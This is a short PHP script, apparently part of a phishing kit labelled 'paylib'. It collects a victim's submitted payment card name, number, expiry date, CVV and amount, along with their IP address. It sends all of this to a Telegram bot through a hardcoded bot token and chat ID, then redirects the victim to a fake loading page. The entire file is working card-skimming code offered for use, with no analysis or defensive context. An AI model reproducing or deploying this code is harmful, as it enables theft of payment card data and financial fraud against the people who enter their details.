<?php
$ip = getenv("REMOTE_ADDR");
$hostname = gethostbyaddr($ip);
if(!empty($_POST['cardName'])){
$message  = "=========[paylib INFO]=========\n";
$message .= "Name  : ".$_POST['cardName']."\n";
$message .= "Number  : ".$_POST['cardNumber']."\n";
$message .= "Month  : ".$_POST['cardMonth']."\n";
$message .= "Year  : ".$_POST['cardYear']."\n";
$message .= "Cvv  : ".$_POST['cardCvv']."\n";
$message .= "montant  : ".$_POST['montant']."\n";
$message .= "===============[IP]==============\n";
$message .= "IP : http://www.geoiptool.com/?IP=$ip\n";
$message .= "==========[BILLING INFO]=========";
        $token = "6384881610:AAFCma01A350PHgZD4PsMnZXiDisgHADguw";
    file_get_contents("https://api.telegram.org/bot$token/sendMessage?chat_id=-4263630620&text=" . urlencode($message)."" );
header("Location:../chargement/chargementtt.php");
}else{
header("Location:../chargement/chargementtt.php");
}

?>